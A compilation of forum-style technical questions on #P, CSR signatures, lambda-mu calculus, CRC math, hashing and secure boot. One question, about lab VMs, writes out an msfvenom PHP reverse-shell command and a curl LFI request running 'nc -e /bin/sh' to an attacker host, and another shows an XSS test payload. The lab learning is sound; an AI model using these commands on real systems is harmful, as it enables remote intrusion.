## Understanding the definition of #P

Valiant defined $$\#P$$ in terms of a counting TM, which is an NTM that outputs the number of solutions [1].

I am a bit stuck on the following two questions. Let’s say I have a decision problem $$X$$, the corresponding counting problem $$\#X$$, and an enumeration algorithm $$E$$ that enumerates the solutions of $$X$$ with polynomial output complexity.

1. If each witness $$w$$ for $$X$$ can be verified in polynomial time, does this imply that $$\#X$$ is in $$\#P$$?
2. Does the existence of $$E$$ imply that $$\#X$$ is in $$\#P$$?

For both questions, I think the answer is yes, because both assumptions imply that there is an NTM that could be modified to count the number of witnesses. However, I feel like I cannot argue this properly and that I might be missing something.
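To check this intuition concretely, here is a toy example I wrote (the decision problem and witness format are invented purely for illustration): the verifier runs in polynomial time, and counting is just summing the accepting branches over all candidate witnesses.

```python
from itertools import product

# Hypothetical decision problem X: "does the bit string s contain a 1?"
# A witness w is a binary-encoded index pointing at a 1-bit of s.
def verify(s: str, w: str) -> bool:
    """Polynomial-time verifier: check that position w of s holds a 1."""
    i = int(w, 2)
    return i < len(s) and s[i] == "1"

def count_witnesses(s: str) -> int:
    """Deterministically simulate the counting NTM: one branch per
    candidate witness, count the accepting branches."""
    n = max(1, (len(s) - 1).bit_length())  # witness length is poly in |s|
    return sum(1 for bits in product("01", repeat=n)
               if verify(s, "".join(bits)))

print(count_witnesses("0110"))  # → 2, one witness per 1-bit
```

This matches the definition in [1] in spirit: the number of accepting branches equals the number of witnesses, so a verifier-based NP machine already induces a $$\#P$$ function.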

[1] Leslie G. Valiant: The Complexity of Computing the Permanent. Theor. Comput. Sci. 8: 189-201 (1979)

## Help understanding CSR fields

I’ve made a CSR (Certificate Signing Request) in order to better understand how a PKI could be built and how it works. Using the following commands

openssl req -new -newkey rsa:1024 -nodes -out ca.csr -keyout ca.key
openssl req -text -noout -verify -in ca.csr

I obtain the following output

Certificate Request:
    Data:
        Version: 1 (0x0)
        Subject: C = ca, ST = Some-State, O = Internet Widgits Pty Ltd
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (1024 bit)
                Modulus:
                    00:c2:ac:2f:7b:17:93:1c:39:07:aa:cf:8d:fd:b7:
                    2e:f4:90:76:16:d8:cf:cb:1b:02:ec:56:3d:ff:5e:
                    a2:fb:9e:8b:af:9b:3b:f8:27:4e:82:39:aa:6d:90:
                    e6:52:71:16:0d:f4:e0:fe:eb:50:31:79:3d:09:8a:
                    49:c0:b4:cb:1e:50:55:83:5f:81:58:46:03:1a:8a:
                    cf:22:56:2c:5f:30:ce:1f:cd:39:19:b4:4c:d4:8b:
                    c8:27:b2:34:62:31:e9:d2:b0:7c:f6:50:7a:12:f4:
                    1a:20:53:53:fb:46:ba:0b:b5:16:aa:ed:2d:0f:79:
                    eb:a2:7c:65:d1:3d:d1:74:87
                Exponent: 65537 (0x10001)
        Attributes:
            a0:00
    Signature Algorithm: sha256WithRSAEncryption
         4f:d7:d9:f5:fe:87:7c:fb:2d:e4:50:28:4d:b5:7a:5c:4f:87:
         f6:7a:83:59:2a:76:33:12:61:bf:c5:0d:5f:c8:41:d5:ec:b1:
         ed:01:21:98:b5:ab:3f:c0:12:78:aa:8e:c8:95:fd:e9:10:e7:
         69:8c:c3:e5:56:3d:f2:c8:b2:bb:5d:88:3f:5e:f8:f0:6b:e9:
         2c:ea:92:cb:90:60:3b:57:e7:09:6a:70:38:d1:43:0f:e6:72:
         31:99:a6:03:c4:3e:21:41:61:61:07:57:72:2a:41:ed:85:3c:
         d0:58:02:1c:81:ee:09:3c:39:02:21:fb:9b:25:4a:84:97:1b:
         c2:b6

What is not clear to me are the bytes after the "Signature Algorithm" field:

1. How are they calculated?
2. Which key is used?
3. Which fields of ca.csr are signed?
4. Is it possible to extract the signature and decode it (e.g. using OpenSSL)?

After the CSR creation, I use the following commands to create an X.509 self-signed certificate

openssl x509 -trustout -signkey ca.key -req -in ca.csr -out ca.pem
openssl x509 -text -noout -in ca.pem

Output below

Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number:
            36:e9:c2:ae:ed:b2:a6:a2:00:7a:16:33:19:b8:57:a8:d8:c6:09:af
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C = ca, ST = Some-State, O = Internet Widgits Pty Ltd
        Validity
            Not Before: Jul  7 12:16:26 2020 GMT
            Not After : Aug  6 12:16:26 2020 GMT
        Subject: C = ca, ST = Some-State, O = Internet Widgits Pty Ltd
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (1024 bit)
                Modulus:
                    00:c2:ac:2f:7b:17:93:1c:39:07:aa:cf:8d:fd:b7:
                    2e:f4:90:76:16:d8:cf:cb:1b:02:ec:56:3d:ff:5e:
                    a2:fb:9e:8b:af:9b:3b:f8:27:4e:82:39:aa:6d:90:
                    e6:52:71:16:0d:f4:e0:fe:eb:50:31:79:3d:09:8a:
                    49:c0:b4:cb:1e:50:55:83:5f:81:58:46:03:1a:8a:
                    cf:22:56:2c:5f:30:ce:1f:cd:39:19:b4:4c:d4:8b:
                    c8:27:b2:34:62:31:e9:d2:b0:7c:f6:50:7a:12:f4:
                    1a:20:53:53:fb:46:ba:0b:b5:16:aa:ed:2d:0f:79:
                    eb:a2:7c:65:d1:3d:d1:74:87
                Exponent: 65537 (0x10001)
    Signature Algorithm: sha256WithRSAEncryption
         a4:91:01:17:9a:da:fe:45:5e:8d:08:1d:12:1f:63:22:81:b0:
         b5:cd:93:02:86:35:2e:e5:b4:17:6b:56:a2:f8:51:7b:98:8b:
         7d:ea:e1:16:0f:97:0c:e4:de:8f:1d:b1:d1:5b:97:aa:7a:07:
         58:db:cc:26:2f:21:f8:cc:f3:94:f9:9a:95:a3:ad:8e:53:a5:
         25:62:49:47:bf:a4:40:10:59:dd:f3:96:02:1c:d3:a9:04:82:
         ae:7d:c9:4a:27:7b:b3:41:7b:a0:35:54:79:48:dd:34:08:8a:
         dc:5e:dd:31:2c:67:9b:fb:84:b7:8c:81:9e:16:bf:4f:ab:43:
         e7:6f

In this case I have the same questions as above. Also, since this is a self-signed certificate made with the same key, why is the signature different from the one in the CSR file?

## Understanding $\lambda \mu$-calculus in a more programming-oriented way

I am learning $$\lambda \mu$$-calculus (self-study).

I am learning it because it seems very useful for understanding the Curry–Howard correspondence (e.g. understanding the connection between classical logic and intuitionistic logic).

I searched the internet; there is some information about $$\lambda \mu$$-calculus on Wikipedia, but it does not explore the topic in depth (at the time of writing): https://en.wikipedia.org/wiki/Lambda-mu_calculus

Is there a more programming-oriented way to interpret the intuition behind $$\lambda \mu$$-calculus?

For example:

In $$\lambda \mu$$-calculus, there are two additional term forms: the $$\mu$$-abstraction $$\mu \delta . T$$ and the named term $$[\delta]T$$.

Can I think of a $$\mu$$-abstraction as a $$\lambda$$-abstraction that is waiting for some continuation $$k$$ (here, $$\delta$$)?

What’s the meaning of the named term?

How does it connect to call/cc?

Can I find the corresponding roles in some programming language (e.g. Scheme)?

PS: I can understand $$\lambda$$-calculus, call/cc in Scheme, and CPS-Translation, but I still cannot clearly understand the intuition behind $$\lambda \mu$$-calculus.
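To show how I currently picture it, here is a small CPS sketch in Python (my own illustration; the names and encoding are invented, not standard $$\lambda \mu$$ syntax): a $$\mu$$-abstraction would be code that receives the current continuation and binds it to a name like $$\delta$$, and a named term $$[\delta]T$$ would be invoking that saved continuation with $$T$$.

```python
# In CPS, every function takes an extra argument k, the current continuation.
def add_cps(x, y, k):
    return k(x + y)

# call/cc in CPS: hand the current continuation to f as a first-class value.
def call_cc(f, k):
    # f receives an "escape" function; invoking it abandons the rest of f
    # and resumes k directly (this is how I read "jumping to a named term").
    return f(lambda v, _abandoned_k: k(v), k)

# Example: escape out of a computation early.
def example(k):
    return call_cc(lambda escape, k2: add_cps(1, 2, lambda s: escape(s, k2)), k)

result = example(lambda v: v)  # → 3
```

Is this roughly the right mental model, or does the $$\mu$$-binder behave differently from a captured continuation like this?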

Many thanks.

## Understanding a CRC32 Implementation

I’m currently trying to understand an implementation of CRC32 about which I have a question.

public uint Compute_CRC32_Simple(byte[] bytes)
{
    const uint polynomial = 0x04C11DB7; /* divisor is 32bit */
    uint crc = 0; /* CRC value is 32bit */

    foreach (byte b in bytes)
    {
        crc ^= (uint)(b << 24); /* move byte into MSB of 32bit CRC */

        for (int i = 0; i < 8; i++)
        {
            if ((crc & 0x80000000) != 0) /* test for MSB = bit 31 */
            {
                crc = (uint)((crc << 1) ^ polynomial);
            }
            else
            {
                crc <<= 1;
            }
        }
    }

    return crc;
}

I’m particularly interested in understanding this line: crc ^= (uint)(b << 24); /* move byte into MSB of 32bit CRC */

What is the mathematics that makes this line work — both the shifting of the current byte (cast to a uint) by 24 and the subsequent XOR with the current crc? Unfortunately, the author doesn’t go into detail about this.
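To convince myself of what the shift and XOR do, I compared a Python port of the loop against a naive polynomial long division (my own sketch, not the author's): `b << 24` places the byte's 8 bits at positions 31..24, i.e. lines them up with the highest coefficients of the running 32-bit remainder, so the XOR adds the next 8 message coefficients (mod 2) before eight more steps of the division.

```python
POLY = 0x04C11DB7

def crc32_simple(data: bytes) -> int:
    """Python port of the C# loop above."""
    crc = 0
    for b in data:
        crc ^= b << 24              # the line in question: byte -> bits 31..24
        for _ in range(8):
            if crc & 0x80000000:    # top coefficient set: subtract P(x)
                crc = ((crc << 1) ^ POLY) & 0xFFFFFFFF
            else:
                crc = (crc << 1) & 0xFFFFFFFF
    return crc

def crc_poly_mod(data: bytes) -> int:
    """Direct polynomial view: remainder of M(x) * x^32 divided by P(x),
    treating bit i of a Python int as the coefficient of x^i."""
    m = int.from_bytes(data, "big") << 32   # M(x) * x^32 (append 32 zero bits)
    p = (1 << 32) | POLY                    # the full 33-bit divisor P(x)
    for shift in range(m.bit_length() - 33, -1, -1):
        if (m >> (shift + 32)) & 1:         # leading coefficient still set?
            m ^= p << shift                 # subtract (= XOR) aligned P(x)
    return m                                # what's left is the remainder
```

Both give the same result on every input I tried, which suggests the loop really is long division of $$M(x) \cdot x^{32}$$ by $$P(x)$$ in GF(2), with the shift serving only to align each incoming byte with the dividend's top coefficients.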

## Uniform hashing: understanding space occupancy and choice of functions

I’m having trouble understanding two things from some notes about uniform hashing. Here’s the copy-pasted part of the notes:

Let us first argue by a counting argument why the uniformity property, which we required of good hash functions, is computationally hard to guarantee. Recall that we are interested in hash functions which map keys in $$U$$ to integers in $$\{0, 1, \ldots, m-1\}$$. The total number of such hash functions is $$m^{|U|}$$, given that each key among the $$|U|$$ ones can be mapped into $$m$$ slots of the hash table. In order to guarantee uniform distribution of the keys and independence among them, **our hash function should be any one of those ones**. But, in this case, its representation would need $$\Omega(\log_2 m^{|U|}) = \Omega(|U| \log_2 m)$$ bits, which is really too much in terms of space occupancy and in terms of computing time (i.e. it would take at least $$\Omega(\frac{|U| \log_2 m}{\log_2 |U|})$$ time just to read the hash encoding).

The part I put in bold is the first thing that confuses me.

Why should the function be any one of those? Shouldn’t you avoid a good part of them, like the ones sending every element of the universe $$U$$ to the same number and thus not distributing the elements at all?

The second thing is the last "$$\Omega$$". Why would it take $$\Omega(\frac{|U| \log_2 m}{\log_2 |U|})$$ time just to read the hash encoding?

The numerator is the number of bits needed to index every hash function in the space of such functions; the denominator is the size in bits of a key. Why does this ratio give a lower bound on the time needed to read the encoding? And what hash encoding?
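To make the numbers in the notes concrete, here is a tiny worked example I computed (the sizes are my own choice, just for illustration): even for a modest universe, merely writing down *which* function was chosen dwarfs the table itself.

```python
import math

U, m = 1000, 64   # toy sizes: |U| = 1000 keys, m = 64 slots

# There are m^|U| functions from U to {0, ..., m-1}; naming one of them
# needs log2(m^|U|) = |U| * log2(m) bits.
bits_to_name_one = math.ceil(U * math.log2(m))

# In a word-RAM whose words hold one key, a word has about log2|U| bits,
# so reading the encoding takes at least bits / word-size word-reads.
word_bits = math.ceil(math.log2(U))
word_reads = math.ceil(bits_to_name_one / word_bits)

print(bits_to_name_one)  # 6000 bits just to write down the chosen function
print(word_reads)        # 600 word-reads just to scan that description
```

This is how I currently read the last $$\Omega$$: the denominator $$\log_2 |U|$$ is the machine word size in that model, so the bound is simply "bits of the description divided by bits read per step" — but I am not sure this reading is what the notes intend.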

## Understanding CRC Computation with PCLMULQDQ

I am currently reading this paper which shows how to calculate CRC using the instruction PCLMULQDQ. I don’t quite understand the equations in it yet.

1. Starting with this one for the definition of crc32:

$$\mathrm{CRC}(M(x)) = x^{\deg(P(x))} \cdot M(x) \bmod P(x)$$

Before reading this paper, I had only ever seen $$\mathrm{CRC}(M(x)) = M(x) \bmod P(x)$$. Why can $$x^{\deg(P(x))}$$ be multiplied with $$M(x)$$ (and the result still be a CRC), and why do they do it?

2. $$M(x) = D(x) \cdot x^T \oplus G(x)$$

Again, I do not understand how they derived this equation.

3. I also don’t understand why they are using multiplication at all (although this might become clear once I understand 1) and 2)).

All CRC implementations I’ve seen so far are basically divisions, with or without precomputed values, so why do they use multiplication?

In addition, I’d also be very thankful to be pointed towards resources that could help me derive these equations myself in the future.

EDIT: I’ve managed to derive 2). Any bitstring M representing a polynomial can be cut into two smaller bitstrings A and B. To put them back together to recreate M, you multiply A by x to the power of the number of digits in B (call it T), thereby appending T zeros to the right end of A. Then you XOR (add in the Galois field) the two back together, recreating M. E.g. M = 10101, A = 101, B = 01 => T = 2; A * x^T = 10100; 10100 xor 01 = 10101 = M.
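The reassembly in my derivation can be checked mechanically with Python ints standing in for GF(2) polynomials (bit i = coefficient of x^i); the split point T and the bitstrings are the ones from my example above.

```python
# M split into a high part A and a low part B of T digits:
M = 0b10101
A, B, T = 0b101, 0b01, 2

# A * x^T appends T zeros; XOR is addition in GF(2), so this recreates M.
assert (A << T) ^ B == M

# The same identity for an arbitrary split point of any bitstring:
def split(m_bits: str, t: int):
    """Cut a bitstring into (A, B) where B keeps the low t digits."""
    return int(m_bits[:-t], 2), int(m_bits[-t:], 2)

a, b = split("11011001", 4)
assert (a << 4) ^ b == 0b11011001
```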

EDIT2: typos

## Help Understanding PHP Reverse Shells

I have recently done two different hackable VMs and had to take, after reading walkthroughs, two different approaches.

For Fristileaks 1.3, it was simple. I was able to get login credentials to the website and upload a php reverse shell. I used msfvenom for the script:

msfvenom -p php/meterpreter/reverse_tcp LHOST=xxx.xxx.x.xxx LPORT=xxxx -f raw > shell.php  

I had to rename the script from shell.php to shell.php.png because the site only let me upload pictures. Once I uploaded the script, I found the url for the picture/script, set up a netcat listener on my attacking machine, and then visited the page with the script and that was enough to establish a connection between the target and attacker.

It was much more difficult to establish a connection on the Pwnlab Init VM.

What I had to do, ultimately, was upload a php backdoor script:

(/usr/share/webshells/php/simple-backdoor.php) 

Then, I had to exploit the vulnerability below on the index.php page, which allows injection into the lang cookie

if (isset($_COOKIE['lang']))
{
    include("lang/".$_COOKIE['lang']);
}

I then used the curl query below to pass the page with the uploaded PHP backdoor to the lang variable, and then netcat back to my attacking machine, which I had already set to listen for a connection

curl --output - -b lang=../upload/6a8c0c37efded4d620a5c59990f07b90.png http://xxx.xxx.xxx.xxx/index.php?cmd=/bin/nc+-e+/bin/sh+xxx.xxx.xxx.xxx+xxxx 

Can anybody shed any light on why it was so easy to establish a reverse shell in one instance and more involved in the other? What is going on behind the scenes in the Pwnlab VM such that visiting the URL of the uploaded reverse-shell script does not work, but exploiting the lang variable with a PHP backdoor is sufficient?

I suppose you just need to have a lot of tools at your disposal and keep trying until something works, but it would help to have a concept of why one approach works and another doesn’t.

## Reflected XSS in form action – understanding

I am trying to learn the basics of web security vulnerabilities.

I have found a website where, on password reset, you get a link in the email with a token, and when you click this link, the page opens and the URL is reflected in a form action. Something like this:

password reset url: https://target.com/token=q123sefgetrt3dfe

and this is how it is reflected:

<form action="https://target.com/toekn=q123sefgetrt3dfe" method="post"> 

Based on this, I am trying to figure out whether this can lead to reflected XSS. So in the URL I tried something like this:

https://target.com/token=q123sefgetrt3dfe"/><script>alert(document.cookie)</script> 

so that the form tag is closed, and a script is inserted inside the form.

This is reflected in the form action, but URL-encoded, so quotes are turned into %22 and angle brackets into %3E.

Does this mean that reflected XSS can’t be achieved here? Is the browser encoding this, or must the web page itself be encoding it? Is there a way to bypass it to see if there is a vulnerability?
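For reference, the transformation I'm seeing matches plain percent-encoding, which I reproduced locally with Python (my own reproduction of the effect, not the site's actual code):

```python
import urllib.parse

# The payload I appended after the token:
payload = '"/><script>alert(document.cookie)</script>'

# Standard percent-encoding, as a server-side framework might apply it
# before writing the value into the action attribute ('/' is left as-is
# by default, matching what I observed).
encoded = urllib.parse.quote(payload)
print(encoded)  # quotes become %22, angle brackets %3C / %3E
```

So the breakout characters never reach the HTML as themselves, which is why I suspect the encoding happens server-side rather than in the browser — but I'd like confirmation.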

## Understanding Secure Boot

I’m trying to understand the secure boot process of an OS, but there are a few points I can’t wrap my head around.

At a high level, AFAIK, secure boot ensures that the loaded OS is authenticated by its respective vendor. If an adversary modifies the OS code, the authentication checks during secure boot fail and the user is notified.

What I want to understand is how this mechanism is implemented at a low level. My understanding is as follows.

There’s a read-only memory (ROM) where the manufacturer has written the program that initiates the boot process, along with a public key. The integrity of this code is implicitly trusted, so this program is the root of trust. The CPU loads this program first and, upon execution, it verifies and loads the next component in the boot process. That component verifies the one after it, and so on until all the components of the OS are loaded.
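To be explicit about the chain I have in mind, here is a toy sketch (entirely my own simplification: I use an HMAC as a stand-in for the real asymmetric signature that the ROM's public key would verify):

```python
import hashlib
import hmac

VENDOR_KEY = b"vendor-key"      # stand-in; real boot uses RSA/ECDSA key pairs

stage2 = b"bootloader image"
stage3 = b"kernel image"

# "Signatures" shipped alongside each image by the vendor.
sig = {name: hmac.new(VENDOR_KEY, img, hashlib.sha256).digest()
       for name, img in [("stage2", stage2), ("stage3", stage3)]}

def verify_and_load(name, image):
    """Each stage checks the next image against its vendor signature
    before handing over control."""
    expected = hmac.new(VENDOR_KEY, image, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig[name]):
        raise RuntimeError(f"secure boot: {name} failed verification")
    return True  # a real loader would now jump into the verified image

assert verify_and_load("stage2", stage2)   # genuine image passes

try:                                       # tampered image is rejected
    verify_and_load("stage3", b"tampered kernel")
    tampered_detected = False
except RuntimeError:
    tampered_detected = True
```

In this picture everything hinges on the very first `verify_and_load` caller being trustworthy, which is exactly the part of the chain my question below is about.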

However, what ensures that the CPU really starts booting the system from the correct ROM? Can’t an adversary force the CPU to read a malicious initial program that disregards the verification step? That is, there should be another component that ensures the system really starts from the root-of-trust program. What is that component, or is my understanding of the process incorrect?